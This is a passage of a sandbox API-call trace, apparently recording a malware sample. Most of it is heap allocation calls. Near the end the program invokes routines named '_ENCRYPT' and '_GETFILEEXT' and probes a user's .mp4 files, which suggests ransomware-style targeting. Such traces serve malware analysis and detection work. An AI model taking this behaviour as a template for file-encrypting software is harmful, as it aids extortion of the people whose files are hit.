[0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.221] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.223] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.223] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.224] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.225] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0192.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.226] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.226] CloseHandle (hObject=0x158) returned 1 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.226] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.227] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.227] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.227] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.227] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.228] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.228] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0x90add8 [0192.228] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0x90add8 [0192.228] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.229] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.232] CompareStringW (Locale=0x400, 